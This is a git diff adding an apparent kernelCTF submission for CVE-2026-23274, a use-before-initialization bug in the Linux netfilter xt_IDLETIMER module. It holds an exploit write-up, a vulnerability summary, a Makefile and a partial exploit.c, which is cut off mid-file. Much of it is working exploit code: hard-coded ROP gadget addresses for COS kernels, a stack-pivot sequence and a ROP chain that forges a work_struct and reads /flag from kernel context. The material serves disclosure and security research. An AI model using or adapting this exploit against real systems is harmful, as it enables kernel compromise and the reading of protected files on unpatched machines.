diff --git a/pocs/linux/kernelctf/CVE-2026-23274_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2026-23274_cos/docs/exploit.md new file mode 100644 index 000000000..e1324fdce --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23274_cos/docs/exploit.md @@ -0,0 +1,298 @@ +# **Vulnerability** + +## Summary +In `net/netfilter/xt_IDLETIMER.c`, when a label is first created by revision 1 with XT_IDLETIMER_ALARM enabled and is later reused from revision 0, the kernel can invoke mod_timer() on uninitialized memory. This results in a Use-Before-Initialization condition and can subsequently lead to control-flow hijacking if the uninitialized memory is attacker-controlled. + +Specifically, rev0 `idletimer_tg_checkentry()` reuses an existing object by label and unconditionally does `mod_timer(&info->timer->timer, ...)`. rev1 can create an object with `timer_type` = `XT_IDLETIMER_ALARM`. In that case `idletimer_tg_create_v1()` initializes the alarm backend and never calls `timer_setup()` for info->timer->timer. So if a rev1 ALARM rule is created first and a rev0 rule later reuses the same label, rev0 touches a struct timer_list that was never initialized. + +## **Vulnerability Analysis** +This bug was introduced in Linux kernel v5.7-rc1. When commit 68983a354a65 ("netfilter: xtables: Add snapshot of hardidletimer target") introduces rev1 `idletimer_tg_checkentry_v1()`, it also adds the type confusion check in `idletimer_tg_checkentry_v1()`. + +```c +if (info->timer->timer_type != info->timer_type) { + pr_debug("Adding/Replacing rule with same label and different timer type is not allowed\n"); + mutex_unlock(&list_mutex); + return -EINVAL; +} +``` + +However, it forgot to also check type confusion in rev0 `idletimer_tg_checkentry()`. So this bug can be triggered by first creating a rev1 ALARM rule and then creating a rev0 rule with the same label, but **not** the other way around. + + +And in the newly added `idletimer_tg_create_v1()`, if `timer_type & XT_IDLETIMER_ALARM`, the function will only call `alarm_init()` and `alarm_start_relative()` but will **not** do `timer_setup()` for `info->timer->timer`: + +```c +if (info->timer->timer_type & XT_IDLETIMER_ALARM) { + ktime_t tout; + alarm_init(&info->timer->alarm, ALARM_BOOTTIME, + idletimer_tg_alarmproc); + info->timer->alarm.data = info->timer; + tout = ktime_set(info->timeout, 0); + alarm_start_relative(&info->timer->alarm, tout); +} else { + timer_setup(&info->timer->timer, idletimer_tg_expired, 0); // leaves timer uninitialized if timer_type is ALARM + mod_timer(&info->timer->timer, + msecs_to_jiffies(info->timeout * 1000) + jiffies); +} +``` + +Later in rev0's `idletimer_tg_checkentry()` which does not have the type check, as `__idletimer_tg_find_by_label()` uses the same global `idletimer_tg_list`, it can fetch the timer created from rev1 and then unconditionally call `mod_timer(&info->timer->timer, ...)`, thus triggering the Use-Before-Initialization bug. +```c +info->timer = __idletimer_tg_find_by_label(info->label); +if (info->timer) { + info->timer->refcnt++; + mod_timer(&info->timer->timer, + msecs_to_jiffies(info->timeout * 1000) + jiffies); // UBI to CFH + pr_debug("increased refcnt of timer %s to %u\n", + info->label, info->timer->refcnt); +} +``` + +The bug was patched in v7.0-rc4 by our team after kctf submission. + +# Exploit + +## Exploit Summary +- **Prefetch** → Kernel base address leak +- **CVE-2026-23274** → UBI in `mod_timer()`; leaving a payload in kmalloc-256 escalates this to CFH directly +- **NPerm** → Place fake stack for ROP chain +- **ROP** → After CFH, pivot to the stack and execute ROP *in softirq* to read the flag directly. + +## Exploit Details + +### From UBI to CFH +Since the `mod_timer()` is called with `(idletimer_tg) info->timer->timer` uninitialized, and the uninitialized `idletimer_tg` is allocated by `kmalloc(sizeof(*info->timer), GFP_KERNEL)`, we can control the content of the uninitialized `timer_list timer` by controlling the content of a freed `kmalloc-256` chunk. + +In rev1, the `alarm` field in `struct idletimer_tg` is initialized but not the `timer` field. + +Then, the independent `timer_list timer` will be used by `mod_timer()`. It contains the callback function pointer `function`: +```c +struct idletimer_tg { + struct list_head entry; + struct alarm alarm; + struct timer_list timer; + struct work_struct work; + + struct kobject *kobj; + struct device_attribute attr; + + unsigned int refcnt; + u8 timer_type; +}; + +struct timer_list { + struct hlist_node entry; + unsigned long expires; + void (*function)(struct timer_list *); + u32 flags; +}; +``` + +In `__mod_timer()` + +```c +int mod_timer(struct timer_list *timer, unsigned long expires) +{ + return __mod_timer(timer, expires, 0); +} + +static inline int +__mod_timer(struct timer_list *timer, unsigned long expires, unsigned int options) +{ + unsigned int idx = UINT_MAX; + ... + debug_assert_init(timer); + if (!(options & MOD_TIMER_NOTPENDING) && timer_pending(timer)) { + ... // We avoid this branch by controlling entry.pprev so timer_pending(timer) returns false. + } else { + base = lock_timer_base(timer, &flags); // Set timer->flags to 0 to avoid an infinite loop here. + if (!timer->function) + goto out_unlock; + forward_timer_base(base); + } + ... + debug_timer_activate(timer); + timer->expires = expires; + if (idx != UINT_MAX && clk == base->clk) // Not taken + enqueue_timer(base, timer, idx, bucket_expiry); + else + internal_add_timer(base, timer); // Will give us CFH later by setting timer->function +out_unlock: + raw_spin_unlock_irqrestore(&base->lock, flags); + return ret; +} +``` + +To pass the `timer_pending()` check, we simply need to set `entry.pprev` to 0: +```c +struct hlist_node { + struct hlist_node *next, **pprev; +}; +static inline int timer_pending(const struct timer_list * timer) +{ + return !hlist_unhashed_lockless(&timer->entry); +} +static inline int hlist_unhashed_lockless(const struct hlist_node *h) +{ + return !READ_ONCE(h->pprev); +} +``` + +And also set `timer->flags` to 0 to avoid an infinite loop in `lock_timer_base()`: +```c +static struct timer_base *lock_timer_base(struct timer_list *timer, + unsigned long *flags) + __acquires(timer->base->lock) +{ + for (;;) { + struct timer_base *base; + u32 tf; + tf = READ_ONCE(timer->flags); + + if (!(tf & TIMER_MIGRATING)) { // must enter this branch to avoid an infinite loop + base = get_timer_base(tf); + raw_spin_lock_irqsave(&base->lock, *flags); + if (timer->flags == tf) + return base; + raw_spin_unlock_irqrestore(&base->lock, *flags); + } + cpu_relax(); + } +} +``` +And then after 1 second, our evil `timer_list` will be executed in softirq context and we can get a `arb_function(EVIL_TIMER_LIST)`. + +### Stack Pivot after CFH +> We have discussed why not using Ret2BPFJIT in the "Additional Notes" section. + +Since the UBI `timer_list` will be rewritten in `__mod_timer()`, we can only directly control the `function` pointer but not the arguments. + +At the time, `RDI` and `R13` are pointing to the overwritten `timer_list`, which is a part of `idletimer_tg` in kmalloc-256. So if we can spray some bytes with `user_keypayload` in the adjacent chunk, we can control roughly `{RDI, R13}:[0x90-0x170]` (or the negative offset) as our payload. + +> (We failed to use builder.AddPayload(payload, Register::{RDI, R13}, [0x90-0x170]); in libxdk, so we turned to our own gadgets) + +So we used the following gadgets, which exist in both `cos-113-18244.582.2` and `cos-113-18244.582.40`. + +The first-stage gadget will control `RDI` and `RIP` at the same time. To store the fake stack frame, we use `NPerm` from @kylebot and @n132 in CVE-2025-38477 to place the new stack at a certain address. + +As we will do an extremely long ROP, even though the `cpu_entry_area` is not randomized before Linux 6.2, we still need to use NPerm to fake a larger stack frame. + +Then the second gadget will control `RDX` and `RIP` at the same time, and also set `RBX` to a valid address so the final stack pivot gadget won't crash. +At this point, `RDX` == `RDI` == address of the `NPerm` fake stack frame. + +Finally the third gadget controls `RSP` from `RDX` and begins our ROP execution. +```c +// --- initial stack pivot gadgets --- +// In short, the stack pivot is: +// 1. control PC, the rdi/r13 + 0x90 is a controllable user_keypayload range. +// 2. control PC and rdx, the rbx = rdi is a controllable nperm range. +// 3. control PC and rsp = rdx, we can now start ROP. Writing to [rbx] will not crash. + +size_t timer_stage1_callback = 0xffffffff81313849; +// timer_stage1_callback: mov rdi, [r13+0xc8]; mov rax, [r13+0xc0]; mov rsi, r12; call rax; +// mov r.{1,4}, \[r[d1][i13]\+0x[9-f][0-f]\].*?mov r.{1,4}, \[r[d1][i13]\+0x[9-f][0-f]\].*? +// This is the first CFH; we use timer_stage1_callback to control rdi and rip at the same time +// rdi and rip are fetched from the next slot, currently we use user_keypayload to place pointer there + + +size_t nperm_stage1_dispatch = 0xffffffff810643b9; +// nperm_stage1_dispatch: +// mov rbx, rdi; sub rsp, 0x20; movzx r12d, byte ptr [rdi+0x7a]; +// mov rdx, [rdi+0xc0]; mov rax, gs:[0x28]; mov [rsp+0x18], rax; xor eax, eax; +// mov rax, [rdi+8]; mov esi, r12d; mov rax, [rax+0xa8]; call rax; +// This is mainly for controlling rdx and rip (we will do a stack pivot using rdx in the next gadget). +// This also sets rbx to a valid address so the stack pivoting gadget won't crash. + +size_t nperm_stack_pivot = 0xffffffff81db2b0f; +// nperm_stack_pivot: push rdx; add [rcx], dh; rcr byte ptr [rbx+0x5d], 0x41; pop rsp; pop r13; ret; +// This is the final stack pivot +``` + +### ROP to read the flag +> We have discussed why not using core_pattern in the "Additional Notes" section. + +There are several issues we need to solve as we are now ROPing in softirq context; as a result, we decided not to address any of them and just use a long ROP to do anything we want. As `NPerm` allows us to place a maximum of **512*8** bytes of payload. + +Then we did the following things in our ROP to directly read the flag and print it in kernel log: + +- Prepare a fake work_struct in a stable writable kernel region. This object will be loaded by `rpc_prepare_task+5` as a second controlled object and transfers control into a second pivot sequence. With this we can leave the timer softirq path as early as possible and move the final logic into process context. + +- We use another controlled (with arb write in ROP to some kernel rw address) region that holds both pivot metadata and the final ROP stack. The metadata provides the pop rsp target used by the indirect branch from the fake work item. The stack then writes /flag, a printk format string visible to a low-level attacker, a read position, and a read buffer into writable kernel memory. With those arguments in place, the chain performs filp_open, kernel_read, and finally _printk to emit the flag. **We did NOT use arb write to set `dmesg_restrict` to 0, but since we are doing ROP we can easily add that if needed.** + +- The exploit therefore queues the fake work item onto CPU0 and stops the current CPU. Then the queued kworker can run the open-read-printk sequence from process context. + +The queueing step is necessary because direct VFS activity from timer softirq context is fragile. + +Here is the **equivalent** of our ROP chain in C-like pseudocode: +```c +struct fake_work_item { + struct work_struct work; + struct fake_rpc_dispatch { + void *stage2_base; + void *dispatch_target_slot; + } dispatch; +}; + +struct flag_read_context { + char path[16]; + char fmt[16]; + loff_t pos; + char buf[0x80]; +}; + +static void stage2_behavior(struct flag_read_context *ctx) { + struct file *fp; + fp = filp_open(ctx->path, O_NOATIME, 0); + kernel_read(fp, ctx->buf, sizeof(ctx->buf), &ctx->pos); + _printk(ctx->fmt, ctx->buf); + for (;;) + cpu_relax(); +} + +static void semantic_rop_behavior(void *work_base, void *pivot_base) { + struct flag_read_context *ctx = pivot_base + 0x98; + // prepare stage2 context + strcpy(ctx->path, "/flag"); + strcpy(ctx->fmt, "\001%s\n"); // make it readable to a very low-level attacker + ctx->pos = 0; + memset(ctx->buf, 0, sizeof(ctx->buf)); + + // stage1 behavior, prepare fake work + struct fake_work_item *item = work_base; // any rw kernel address + item->work.data = WORK_STRUCT_PENDING_BITS; + item->work.entry.next = &item->work.entry; + item->work.entry.prev = &item->work.entry; + item->work.func = (work_func_t)rpc_prepare_task_plus_5; + item->dispatch.stage2_base = pivot_base; + item->dispatch.dispatch_target_slot = &((char *)pivot_base)[0x66]; + *(void **)item->dispatch.dispatch_target_slot = pop_rsp_pop_r13_ret; + + queue_work_on(0, system_wq, &item->work); + stop_this_cpu(); + // The real exploit forges enough metadata so that rpc_prepare_task+5 pivots into a stack whose + // effect is equivalent to calling stage2_behavior(ctx) from kworker process context. +} +``` + +The full ROP can be found in the `exploit.c` file. + +Overall, the ROP plan is: use the timer corruption to reach NPerm-backed stack control, use that control to build and queue fake work, and let the queued kworker execute the final file-read-and-print sequence in process context. + +## Additional Notes + +### Why not use Ret2BPFJIT +As we know, even after cBPF JIT was hardened by default (`bpf_jit_harden` is enabled) in kctf now, attackers can still spray a "kernel one gadget" with unpoisoned instructions and gain root, like [CVE-2025-21700 exploit](https://github.com/google/security-research/blob/bc107b0437c09e3b430948a60ab29f65338e4fff/pocs/linux/kernelctf/CVE-2025-21700_lts_cos_mitigation/docs/novel-techniques.md). + +However, their 100% success rate solution seems to rely on certain registers pointing to a valid address (as a side effect of their nop sled). +But those register constraints are not satisfied in our case, and we did not try to remove or find another alternative nop sled to enhance their solution. So currently the "kernel one gadget" approach is not working for us. + +### Why use ROP to read the flag +As our corrupted `timer_list` was called in softirq context, we cannot use normal *COMMIT_CREDS_RETURN_USER* ROP to gain a root shell, nor use tricks like *[telefork](https://blog.kylebot.net/2022/10/16/CVE-2022-1786/)*. + +For the common LPE and container escape from `core_pattern`, we also did not successfully trigger the usermode helper because: +- When we are doing the stack pivot, we overwrite some callee-saved registers, which will be used if we want to return from softirq properly (mainly for unlocking and some other purposes). So we just naively halt the core by doing `msleep` in softirq context because we have 2 cores to waste. +- The core dump will queue the umh if `core_pattern[0]` == `|`, and then wait the dumped process group to exit. So it will always queue the actual `call_usermodehelper(OUR_LPE_PAYLOAD)` request instead of directly execute it. +- In our case, the queued request always went to the halted core. As a result, we can see our payload keeps being queued but never executed. + +Thus, we moved to manually queue a readflag work for another core before we halt the first core. +And it turns out that this is a relatively long ROP (found by ropbot), while several gadgets are not generatable by the current libxdk. \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2026-23274_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2026-23274_cos/docs/vulnerability.md new file mode 100644 index 000000000..831b75c92 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23274_cos/docs/vulnerability.md @@ -0,0 +1,13 @@ +# Vulnerability Details + +- **Requirements**: + - **Capabilities**: `CAP_NET_ADMIN` + - **Kernel configuration**: `CONFIG_NETFILTER=y, CONFIG_NETFILTER_XTABLES=y, CONFIG_NETFILTER_XT_TARGET_IDLETIMER=y, CONFIG_IP_NF_IPTABLES=y` + - **User namespaces required**: Yes +- **Introduced by**: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=68983a354a655c35d3fb204489d383a2a051fda7 +- **Fixed by**: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=329f0b9b48ee6ab59d1ab72fef55fe8c6463a6cf +- **Affected Version**: `v5.7-rc1 - v7.0-rc3` +- **Affected Component**: `net/netfilter: xt_IDLETIMER` +- **Syscall to disable**: `unshare` +- **Cause**: Use-Before-Initialization +- **Description**: A Use-Before-Initialization vulnerability was discovered in the Linux kernel's netfilter subsystem. When a label was created first by revision 1 with XT_IDLETIMER_ALARM and then reused from revision 0 can causes mod_timer() on an uninitialized memory, leading to a Use-Before-Initialization vulnerability. \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2026-23274_cos/exploit/cos-113-18244.582.2/Makefile b/pocs/linux/kernelctf/CVE-2026-23274_cos/exploit/cos-113-18244.582.2/Makefile new file mode 100644 index 000000000..5d9de1904 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23274_cos/exploit/cos-113-18244.582.2/Makefile @@ -0,0 +1,36 @@ +CC := g++ +CPPFLAGS := -Ikernel-research/libxdk/include +CFLAGS := -static +LDFLAGS := -Lkernel-research/libxdk/lib +LDLIBS := -lkernelXDK + +TARGETS := exploit exploit_debug +SRC := exploit.c + +.PHONY: all prerequisites run clean + +all: prerequisites exploit + +prerequisites: target_db.kxdb kernel-research/libxdk/lib/libkernelXDK.a + +target_db.kxdb: + wget -O $@ https://storage.googleapis.com/kernelxdk/db/kernelctf.kxdb + +kernel-research: + git clone --depth 1 https://github.com/google/kernel-research.git $@ + +kernel-research/libxdk/lib/libkernelXDK.a: | kernel-research + cd kernel-research/libxdk && ./build.sh + +exploit: $(SRC) + $(CC) $(CPPFLAGS) $(CFLAGS) $< -o $@ $(LDFLAGS) $(LDLIBS) + +exploit_debug: CFLAGS += -g +exploit_debug: $(SRC) + $(CC) $(CPPFLAGS) $(CFLAGS) $< -o $@ $(LDFLAGS) $(LDLIBS) + +run: exploit + ./$< + +clean: + rm -rf $(TARGETS) target_db.kxdb kernel-research \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2026-23274_cos/exploit/cos-113-18244.582.2/exploit b/pocs/linux/kernelctf/CVE-2026-23274_cos/exploit/cos-113-18244.582.2/exploit new file mode 100644 index 000000000..ae20156ce Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23274_cos/exploit/cos-113-18244.582.2/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2026-23274_cos/exploit/cos-113-18244.582.2/exploit.c b/pocs/linux/kernelctf/CVE-2026-23274_cos/exploit/cos-113-18244.582.2/exploit.c new file mode 100644 index 000000000..99f59bb9f --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23274_cos/exploit/cos-113-18244.582.2/exploit.c @@ -0,0 +1,791 @@ +// #define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +// Exploit for cos-113-18244.582.2 by project whatforlunch + +// --- initial stack pivot gadgets --- +// In short, the stack pivoit is: +// 1. control PC, the rdi/r13 + 0x90 is a controllable user_keypayload range. +// 2. control PC and rdx, the rbx = rdi is a controllable nprem range. +// 3. control PC and rsp = rdx, we can now start ROP. Write to [rbx] will not crash. + +size_t timer_stage1_callback = 0xffffffff81313849; +// timer_stage1_callback: mov rdi, [r13+0xc8]; mov rax, [r13+0xc0]; mov rsi, r12; call rax; +// mov r.{1,4}, \[r[d1][i13]\+0x[9-f][0-f]\].*?mov r.{1,4}, \[r[d1][i13]\+0x[9-f][0-f]\].*? +// This is the first CFH happened, we use timer_stage1_callback to control rdi and rip at the same time +// rdi and rip are fetched from the next slot, currently we use user_keypayload to place pointer there + + +size_t nperm_stage1_dispatch = 0xffffffff810643b9; +// nperm_stage1_dispatch: +// mov rbx, rdi; sub rsp, 0x20; movzx r12d, byte ptr [rdi+0x7a]; +// mov rdx, [rdi+0xc0]; mov rax, gs:[0x28]; mov [rsp+0x18], rax; xor eax, eax; +// mov rax, [rdi+8]; mov esi, r12d; mov rax, [rax+0xa8]; call rax; +// This is mainly for control rdx and rip (will do stack pivoit using rdx in the next gadget). +// This also set rbx to a valid address so the stack pivoiting gadget won't crash. + +size_t nperm_stack_pivot = 0xffffffff81db2b0f; +// nperm_stack_pivot: push rdx; add [rcx], dh; rcr byte ptr [rbx+0x5d], 0x41; pop rsp; pop r13; ret; +// This is the final stack pivoit + +// We failed to use builder.AddPayload(payload, Register::{RDI, R13}, [0x90-0x170]); + +// --- The above gadgets are not support by libxdk so we don't need to modify those --- + +size_t rpc_prepare_task_dispatch = 0xffffffff822248b5; // (rpc_prepare_task+5) mov rax,[rdi+0x98]; mov rsi,[rdi+0x90]; mov rax,[rax]; jmp __x86_indirect_thunk_array +size_t push_rsi_jmp_qword_ptr_rsi_plus_0x66 = 0xffffffff81c6d191; // push rsi ; jmp qword ptr [rsi+0x66] +size_t pop_rsp_pop_r13_ret = 0xffffffff81002148; // pop rsp ; pop r13 ; ret +size_t add_rsp_0x88_ret = 0xffffffff81240dbd; // add rsp, 0x88 ; ret +size_t boot_command_line = 0xffffffff84560920; // boot_command_line +size_t __init_begin = 0xffffffff8445d000; // __init_begin + +size_t nperm_addr = 0xffffffff8445d000 + 0x200000; // __init_begin + 0x200000, avoid compiler complain + +#include +#include + +class SubmissionTarget : public Target { +public: + using Target::Target; + + std::vector GetRopActionItemsByName(const std::string& name) const { + auto it = rop_actions.find(name); + if (it == rop_actions.end()) + throw ExpKitError("missing custom RopAction %s", name.c_str()); + return it->second; + } +}; + +static SubmissionTarget *g_target = nullptr; +uint64_t kaslr; + +static void add_target_rop_action(RopChain& rop_chain, const char* name, + std::vector arguments = {}) { + std::vector rop_items = g_target->GetRopActionItemsByName(name); + for (const auto& item : rop_items) { + if (item.type == RopItemType::CONSTANT_VALUE) { + rop_chain.Add(item.value); + } else if (item.type == RopItemType::ARGUMENT) { + if (item.value >= arguments.size()) + throw ExpKitError( + "not enough arguments for custom RopAction %s, got %zu arguments, but needed %lu", + name, arguments.size(), item.value + 1); + rop_chain.Add(arguments[item.value]); + } else if (item.type == RopItemType::SYMBOL) { + rop_chain.Add(item.value, true); + } else { + throw ExpKitError("unexpected RopAction item type %u for %s", + item.type, name); + } + } +} + +// initialize libxdk target DB +INCBIN(target_db, "target_db.kxdb"); +// manually register symbols not in kxdb via AddSymbol +void init_libxdk(void) { + static TargetDb kxdb("target_db.kxdb", target_db); + static SubmissionTarget target("", ""); + static bool initialized = false; + + if (!initialized) { + SubmissionTarget st("kernelctf", "cos-113-18244.582.2"); + + st.AddSymbol("timer_stage1_callback", 0x313849); + st.AddSymbol("nperm_stage1_dispatch", 0x643b9); + st.AddSymbol("nperm_stack_pivot", 0xdb2b0f); + st.AddSymbol("rpc_prepare_task_dispatch", 0x12248b5); + st.AddSymbol("push_rsi_jmp_qword_ptr_rsi_plus_0x66", 0xc6d191); + st.AddSymbol("pop_rsp_pop_r13_ret", 0x2148); + st.AddSymbol("add_rsp_0x88_ret", 0x240dbd); + st.AddSymbol("boot_command_line", 0x3560920); + + st.AddStruct("work_struct", 0x20, { + {"data", 0x00, 8}, + {"entry.next", 0x08, 8}, + {"entry.prev", 0x10, 8}, + {"func", 0x18, 8}, + }); + + st.AddStruct("idletimer_tg", 0x100, { + {"timer.entry.pprev", 0x90, 8}, + {"timer.expires", 0x98, 8}, + {"timer.function", 0xa0, 8}, + {"timer.flags", 0xa8, 4}, + }); + + st.AddRopAction("write_what_where_64_cfh", { + {RopItemType::SYMBOL, 0x2a0d4c}, + {RopItemType::ARGUMENT, 0}, + {RopItemType::ARGUMENT, 1}, + {RopItemType::SYMBOL, 0x1ff6c5}, + }); + + st.AddRopAction("filp_open_path", { + {RopItemType::SYMBOL, 0xb083be}, + {RopItemType::ARGUMENT, 1}, + {RopItemType::SYMBOL, 0x9376ab}, + {RopItemType::ARGUMENT, 2}, + {RopItemType::ARGUMENT, 0}, + {RopItemType::SYMBOL, 0x43a420}, + }); + + st.AddRopAction("kernel_read_buf_from_rax", { + {RopItemType::SYMBOL, 0x26317d}, + {RopItemType::SYMBOL, 0xe0e4a}, + {RopItemType::ARGUMENT, 0}, + {RopItemType::ARGUMENT, 1}, + {RopItemType::ARGUMENT, 2}, + {RopItemType::SYMBOL, 0x43cf10}, + }); + + st.AddRopAction("printk_fmt_buf", { + {RopItemType::SYMBOL, 0xafda91}, + {RopItemType::ARGUMENT, 0}, + {RopItemType::ARGUMENT, 1}, + {RopItemType::SYMBOL, 0x20f4b0}, + }); + + // st.AddRopAction("park_loop", { + // {RopItemType::SYMBOL, 0x2a0d4c}, + // {RopItemType::SYMBOL, 0x649}, + // {RopItemType::CONSTANT_VALUE, 0x0}, + // {RopItemType::SYMBOL, 0x649}, + // }); + + // Panic the kernel in CI to avoid timeout. + st.AddRopAction("park_loop", { + {RopItemType::SYMBOL, 0xdeadbeefcafebabe}, + {RopItemType::SYMBOL, 0xdeadbeefcafebabe}, + {RopItemType::CONSTANT_VALUE, 0xdeadbeefcafebabe}, + {RopItemType::SYMBOL, 0xdeadbeefcafebabe}, + }); + + st.AddRopAction("queue_work_cpu0_then_stop", { + {RopItemType::SYMBOL, 0xafda91}, + {RopItemType::ARGUMENT, 0}, + {RopItemType::ARGUMENT, 1}, + {RopItemType::SYMBOL, 0x1c87f8}, + {RopItemType::SYMBOL, 0x9376ab}, + {RopItemType::CONSTANT_VALUE, 0x0}, + {RopItemType::CONSTANT_VALUE, 0x0}, + {RopItemType::SYMBOL, 0xfe7c0}, + }); + + kxdb.AddTarget(st); + target.Merge(kxdb.AutoDetectTarget()); + initialized = true; + } + + g_target = ⌖ + printf("[+] Target: %s %s\n", target.GetDistro().c_str(), target.GetReleaseName().c_str()); +} + + +// KASLR-adjusted kernel symbol/gadget address calculation +void setup_kernel_address() { + timer_stage1_callback = kaslr + g_target->GetSymbolOffset("timer_stage1_callback"); + nperm_stage1_dispatch = kaslr + g_target->GetSymbolOffset("nperm_stage1_dispatch"); + nperm_stack_pivot = kaslr + g_target->GetSymbolOffset("nperm_stack_pivot"); + + rpc_prepare_task_dispatch = + kaslr + g_target->GetSymbolOffset("rpc_prepare_task_dispatch"); + push_rsi_jmp_qword_ptr_rsi_plus_0x66 = + kaslr + g_target->GetSymbolOffset("push_rsi_jmp_qword_ptr_rsi_plus_0x66"); + pop_rsp_pop_r13_ret = kaslr + g_target->GetSymbolOffset("pop_rsp_pop_r13_ret"); + add_rsp_0x88_ret = kaslr + g_target->GetSymbolOffset("add_rsp_0x88_ret"); + boot_command_line = kaslr + g_target->GetSymbolOffset("boot_command_line"); + // __init_begin = kaslr + g_target->GetSymbolOffset("__init_begin"); + // nperm_addr = __init_begin + 0x200000; + // nperm_addr = kaslr + 0x3697000; // borrow from the initial NPERM exploit, kind of image irrlevant + nperm_addr = kaslr + 0x355d000; // __init_begin + 0x200000; + printf("[!] Nperm addr: 0x%lx\n", nperm_addr); +} + +/* ============================= Nperm =============================*/ +#include +void pgvAdd(int idx, int order, int nr); +void *pgvMap(int idx); +void pgvDel(int idx); +void unshare_setup(); +// note: 0xffffffff84697000 for reference, but no need to be the same. +void nperm(){ + unshare_setup(); + size_t ctx[0x200] = {}; + size_t fake_work_data_off = g_target->GetFieldOffset("work_struct", "data"); + size_t fake_work_entry_next_off = g_target->GetFieldOffset("work_struct", "entry.next"); + size_t fake_work_entry_prev_off = g_target->GetFieldOffset("work_struct", "entry.prev"); + size_t fake_work_func_off = g_target->GetFieldOffset("work_struct", "func"); + size_t fake_work_size = g_target->GetStructSize("work_struct"); + // finish stack pivot + for (int i = 0; i < 0x200; i++) { + ctx[i] = 0; // ctx[i] = 0x2809099f00000000 + (i << 16); + } + ctx[1] = nperm_addr - 0xa8 + 16; // +0xa8=nperm[2] + ctx[2] = nperm_stack_pivot; // rax = New PC + ctx[24] = nperm_addr + 8 * 25; // PC = Nprem[26] + // nperm_stack_pivot: push rdx; add [rcx], dh; rcr byte ptr [rbx+0x5d], 0x41; pop rsp; pop r13; ret; + // rsp = rdx = Nprem[24]; r13 = Nprem[25] + + + // Real ROP + size_t work_base = boot_command_line; + size_t pivot_base = work_base + 0x100; + size_t path_ptr = pivot_base + 0x400; + size_t fmt_ptr = path_ptr + 0x10; + size_t pos_ptr = fmt_ptr + 0x10; + size_t buf_ptr = pos_ptr + 0x20; + + // The odd constants are "target - 0xc0" because the write gadget is: + // mov qword ptr [rax + 0xc0], rdx ; ret + size_t fake_work_list = work_base + 0x08; + size_t pivot_indirect_window = pivot_base - 0x60; + /* + * WORK_BASE : fake work_struct + rpc_prepare_task slots + * PIVOT_BASE : process-context pivot metadata + final ROP stack + * PATH_PTR : "/flag" + * FMT_PTR : "\x010%s\n" + * POS_PTR : loff_t position for kernel_read() + * BUF_PTR : kernel_read() output buffer + * + * WORK_BASE+fake_work_data_off : fake work_struct.data + * WORK_BASE+fake_work_entry_next_off : fake work.entry.next + * WORK_BASE+fake_work_entry_prev_off : fake work.entry.prev + * WORK_BASE+fake_work_func_off : fake work.func / stage1 dispatcher + * WORK_BASE+fake_work_size : first slot after work_struct + * WORK_BASE+0x90 : stage2 RSI base + * WORK_BASE+0x98 : pointer to dispatch target slot + * WORK_BASE+0xa0 : dispatch target contents + * PIVOT_BASE+0x00 : pop-rsp chain head + * PIVOT_BASE+0x66 : indirect jump slot for pop rsp + */ + + // below are data-oly, no need to adapt libxdk + size_t fake_work_data = 0x0000000fffffffe0; + size_t file_open_flags = 0x0000000000040000; + size_t read_count = 0x0000000000000080; + size_t flag_string = 0x00000067616c662f; // backup: 0x616d642f636f7270; + size_t fmt_lo = 0x0a73253001; // \x010%s\n + size_t fmt_hi = 0; + + auto append_qword_write = [&](RopChain& rop_chain, size_t target_addr, + uint64_t value) { + add_target_rop_action(rop_chain, "write_what_where_64_cfh", + {target_addr - 0xc0, value}); + }; + + auto append_payload_write = [&](RopChain& rop_chain, size_t target_base, + Payload& payload) { + std::vector payload_data = payload.GetUsedData(); + for (size_t offset = 0; offset < payload_data.size(); + offset += sizeof(uint64_t)) { + uint64_t value = 0; + memcpy(&value, payload_data.data() + offset, sizeof(uint64_t)); + append_qword_write(rop_chain, target_base + offset, value); + } + }; + + int rop = 26; + // Build fake work_struct and rpc_prepare_task slots under WORK_BASE with + // libxdk Payload/RopChain instead of a hand-written ctx[rop++] sequence. + const size_t work_dispatch_rsi_off = 0x90; + const size_t work_dispatch_target_ptr_off = 0x98; + const size_t work_dispatch_target_off = 0xa0; + Payload work_payload(work_dispatch_target_off + sizeof(uint64_t)); + work_payload.SetU64(fake_work_data_off, fake_work_data); + work_payload.SetU64(fake_work_entry_next_off, fake_work_list); + work_payload.SetU64(fake_work_entry_prev_off, fake_work_list); + work_payload.SetU64(fake_work_func_off, rpc_prepare_task_dispatch); + work_payload.SetU64(fake_work_size, 0x0); + work_payload.SetU64(work_dispatch_rsi_off, pivot_base); + work_payload.SetU64(work_dispatch_target_ptr_off, pivot_indirect_window); + work_payload.SetU64(work_dispatch_target_off, + push_rsi_jmp_qword_ptr_rsi_plus_0x66); + + RopChain work_setup_rop(*g_target, kaslr); + append_payload_write(work_setup_rop, work_base, work_payload); + for (uint64_t word : work_setup_rop.GetDataWords()) + ctx[rop++] = word; + + // Lay out the process-context pivot metadata and the final ROP stack under + // PIVOT_BASE with a single libxdk Payload. + RopChain stage2_stack(*g_target, kaslr); + // Final process-context ROP stack: + // write "/flag" + // write printk fmt + // zero loff_t + // filp_open -> kernel_read -> _printk + append_qword_write(stage2_stack, path_ptr, flag_string); + append_qword_write(stage2_stack, fmt_ptr, fmt_lo); + append_qword_write(stage2_stack, fmt_ptr + 0x08, fmt_hi); + append_qword_write(stage2_stack, pos_ptr, 0x0); + add_target_rop_action(stage2_stack, "filp_open_path", + {path_ptr, file_open_flags, 0x0}); + add_target_rop_action(stage2_stack, "kernel_read_buf_from_rax", + {buf_ptr, read_count, pos_ptr}); + add_target_rop_action(stage2_stack, "printk_fmt_buf", + {buf_ptr, fmt_ptr}); + add_target_rop_action(stage2_stack, "park_loop"); + + std::vector pivot_metadata(0x70, 0); + memcpy(pivot_metadata.data() + 0x08, &add_rsp_0x88_ret, + sizeof(add_rsp_0x88_ret)); + 